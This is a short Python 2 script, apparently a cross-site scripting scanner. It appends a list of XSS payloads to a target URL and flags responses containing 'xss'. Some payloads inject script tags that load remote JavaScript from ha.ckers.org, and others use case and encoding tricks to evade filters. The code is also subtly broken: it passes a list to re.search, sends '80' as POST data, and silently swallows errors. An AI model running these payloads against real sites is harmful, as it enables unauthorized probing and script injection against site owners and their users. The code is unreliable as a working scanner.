import sys,os,re,urllib,urllib2,socket if len(sys.argv)<2: print "\n beenudel1986[at]gmail[dot]com" print "\n\tXSS Checker" print "\n Usage: xsschecker.py <site>" sys.exit(0) site=sys.argv[1] payload = [ "<script>alert('xss')</script>", "<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>", "<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>", "<IMG SRC=javascript:alert('XSS')>", "<IMG SRC=JaVaScRiPt:alert('XSS')>", "<IMG SRC=javascript:alert("XSS")>", "<IMG SRC=`javascript:alert( 'XSS')`>", "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>", "<IMG SRC=javascript:alert('XSS')>", "<IMG SRC=javascript:alert('XSS')>", "<IMG SRC=javascript:alert('XSS')>", "<IMG SRC=javascript:alert('XSS')>", "<<SCRIPT>alert('XSS');//<</SCRIPT>", "<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>", "<SCRIPT SRC=//ha.ckers.org/.j>", "<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>", "</TITLE><SCRIPT>alert('XSS');</SCRIPT>", "<BODY ONLOAD=alert('XSS')>"] reply=["xss","XSS","Xss"] j=len(payload) print "[+]Invarients Loaded",j for payloads in payload: try: attack= urllib2.urlopen(site+payloads, "80").readlines() print "Trying Payload: ",site+payloads for line in attack: if re.search(reply,line): print "\n\tVulnerablity Found" except(urllib2.URLError, socket.timeout, socket.gaierror, socket.error): pass except(KeyboardInterrupt): pass